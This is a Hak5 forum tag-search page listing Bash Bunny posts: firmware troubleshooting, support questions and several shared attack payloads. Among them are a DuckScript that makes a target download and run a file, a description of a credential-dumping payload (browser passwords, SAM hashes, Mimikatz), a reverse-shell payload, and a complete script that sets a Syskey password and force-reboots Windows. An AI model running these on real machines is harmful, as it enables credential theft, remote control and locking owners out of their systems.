Jump to content

Search the Community

Showing results for tags 'bashbunny'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

  1. First time working with anything like this and I decided to ask for help. I'm trying to get my Bash Bunny MkII to run BunnyPicker as a switch 1 payload. I've got a PuTTy connection (Win10 laptop as my workspace) up and running and have done some minor prep before hitting a wall. Currently trying to git clone a repo, but it returns an error of "unable to access (git repo): could not resolve host: github.com". Running "ping github.com" returns "unknown host github.com". It could 100% be a rookie mistake that's making things worse, and I'll take whatever help and advice is offered.
  2. My Update to 1.1 failed. I did wrong and put the unpacked gz file beside the packed one (I should have read this one https://forums.hak5.org/index.php?/topic/40681-help-installing-11-update/) . Since the device does not start properly. First it fails three times (LED is first green, turns off and stays off). As described here http://wiki.bashbunny.com/#!././index.md#Firmware_Recovery) the firmware recovery seems to start withteh forth start. Here is what the LED says: 00:00 green 00:04 off 00:07 red blinking 04:05 blue/red 04:25 green 04:29 off 04:32 red blinking 04:47 off 04:50 green 04:54 off - stays off Afterwards its starts from strach. Three time green, off and stays off. Forth time same recovery procedure. Does anybody have the same issue? Any way to break trough this loop? BTW The bunny itself becomes very hot.
  3. Hey all! I'm having issues starting my payload in ATTACKMODE HID, then switching to ATTACKMODE HID ECM_ETHERNET. When I do this, my DuckScript pauses for ~20 seconds, then continues the DuckScript without connecting to my BB, so I'm unable to download/wget a file from the BB. Context: I need to start in "HID" to get the default network interface to perform a tcpdump (BB becomes the new default interface when in ECM_ETHERNET mode). Target is Ubuntu 14.04 on a laptop. Any guidance? LED SETUP ATTACKMODE HID GET SWITCH_POSITION GET HOST_IP GET TARGET_IP cd /root/udisk/payloads/$SWITCH_POSITION/ LED SPECIAL ### Open terminal Q CTRL-ALT t Q DELAY 2000 Q STRING "iface=\$(route | grep '^default' | grep -o '[^ ]*\$')" Q ENTER Q DELAY 500 Q STRING echo \$iface Q ENTER Q DELAY 2000 #################################### #### SCRIPT HANGS AT THIS POINT #### #################################### ATTACKMODE HID ECM_ETHERNET # start BB server iptables -A OUTPUT -p udp --dport 53 -j DROP python -m SimpleHTTPServer 80 & # wait until port is listening while ! nc -z localhost 80; do sleep 0.2; done LED ATTACK ### Get file Q STRING wget "http://$HOST_IP/file" Q DELAY 1500 Q STRING chmod +x file Q ENTER Q DELAY 150
  4. Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?
  5. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  6. Is it possible to change the bashbunny device name to something of my choice? I figured it would be in the ATTACKMODE file where the serial number is under /bin. Right now the device reads: "USB Ethernet/RNDIS Gadget" or something to that affect.
  7. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  8. Hey, I have made a group to build, programs, tools, payloads, etc. If you have an idea or want to commute just take a look at the GitHub: https://github.com/CIPH3R0/C1PH3R C1PH3R
  9. I just tried many of your products all used as mentioned in all your video’s and forums. Not one of all the products I bought from hak5 is working properly. it is doing nothing at all. Me on the other hand am busy all day with factory resetting and new configuration. i mean all of them. Really im a totally not satisfied customer and I wonder if you are able to get any of your products to work as you show us. i wonder if there is a totally satisfied customer at all. All the explanations in your video’s and books, just do not make the cut. your a not clear in the books. Explain it to us if we a kids of 7 year old and don’t leave information behind. Ever seen your own forums. There are so many questions the same. I think you have to get your act together. Besides that is your service getting real bad
  10. Hey guys I want to ask if is any way to auto run exw file from bash bunny with a payload? I mean to put the exw file in any bash bunny file directory and plug the bash bunny to the pc and run the exe automatically
  11. Did anyone of you get a working internet connection? I am trying to apt-get update, but it just continue to connect to httpredir.debian.com... root@bunny:/pentest/impacket/examples# apt-get update 0% [Connecting to httpredir.debian.org (140.211.166.202)] I think I need to update because every time I try to run rdp_check.py I get The error under: root@bunny:/pentest/impacket/examples# rdp_check.py CRITICAL:root:pyOpenSSL is not installed, can't continue
  12. I have this strange quacking behaviour: When i output to notepad, This line is quacking just fine: Q STRING ipconfig /all \> f:\\loot\\test.doc This line is not quacking at all: Q STRING ipconfig /all \> f:\\loot\\test.txt Is this a bug, or am I totally overlooking something? This is my simple test script: LED SETUP ATTACKMODE HID DUCKY_LANG no Q STRING ipconfig all \> f:\\loot\\test.doc Q ENTER Q STRING ipconfig all \> f:\\loot\\test.txt Q ENTER LED G 100 I am on version : 1.3_267 Any help would be greatly appreciated.
  13. Since I have a broken BashBunny and the skills to perform a dump or interact with the Development part of the BashBunny. I was wondering if it was allowed to post findings and possible improvements I can make/share with the Dev Community to possibly make this firmware any better?.. -Ar1k88
  14. I saw Darrens video yesterday and thought how his improvements that could be made to the BashBunny. Sometimes, windows defender removes malicious files and therefore it could be smart to use read only storage. But I He said that you could read only storage and exfiltrate the files via network. But I would like to see an improvement made to the bash bunny, to have an read and write exfil partition on the bunny. So one partition where all the payloads and stuff like that are read only but it will also have an partition to exfiltrate small files without the need of network. Ping: @Darren Kitchen
  15. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
  16. Hey guys, Followed the wiki to install the latest firmware manually, waited and after about ~15-20 minutes of waiting and seeing the LED was off, I touched it and it was blistering hot. I removed the bunny, and have proceeded to try every method or suggestion of recovery on this forum and under the sun. When I attempt recovery, it gets incredibly hot and after the red/blue flashed, it lights green for a second and then nothing. It isn't being detected by any of my machines, and I cant SSH into it or screen. I plug it in and it lights green for a second then goes off and will get hot if left in. Anyone experiencing the same or have any suggestions? I've already submitted a ticket, but I wanted to make one more attempt to find a fix.
  17. Testing the BashBunny for use on a physical pentest/red team engagement but noticing a huge problem with using this device for a real world assessment. Mainly, on a Windows 7 x64 desktop, the initial driver install process took over 2 minutes to install. After initial drivers are installed, my payload initializes and finishes within 10 seconds which is great if only I didn't have to install the drivers first... What makes this issue even worse is that the BashBunny doesn't wait until the drivers have been installed before executing the payload which means you need to unplug/re-plug the device in after waiting 2 minutes to execute the payload. Ideally, it would be nice to build some code into the BashBunny to automatically detect when the drivers are installed and then run the payload. Has anyone had any issues with this and is there any way to improve the speed here? 2 minutes is wayyy to long to wait around at an unlocked workstation. I would be better off typing out the payload by hand if it meant only taking 20-30 seconds max.
  18. for some reason when i ssh into my bashbunny i noticed my tools folder looks odd along with the layout of the rest of the bashbunny and now for some reason i cannot install tools when i place something in the tools folder and attempt to install like i normally used to nothing happens and what i placed in the tools folder stays i tried doing a factory reset yet i still get the exact same results and im still unable to install any tools like impacket or responder
  19. Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who does pushed on my behalf..cause I am lazy. I decided to learn git and do it myself.
  20. Hello all, I have 4 headless PCs here at my house and I was wondering in the event the internet goes down and I need to do a file transfer or something. Could I just plug the bash bunny in and have it execute a powershell script so I don't have to find a spare monitor and keyboard? Thanks, new to the bashbunny.
  21. I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88
  22. hey, i think i have a problem with bunny_helpers.sh, when i try to get a variable like $TARGET_IP it returns nothing on the file here's the test script: #!/bin/bash LED R source bunny_helpers.sh GET TARGET_IP echo $TARGET_IP >> /root/udisk/loot/ip.txt LED G (I can't find bunny_helpers.sh on my bunny and i did not find it on the web) thanks :p
  23. I think it may just be me and im kind of a newcomer to all this so im looking for some help, my bash bunny only works for a few payloads but most if it does not work, im on version 1.1 and I dont know how to upgrade sadly so I need help. Can someone who has a BB help me?
×
×
  • Create New...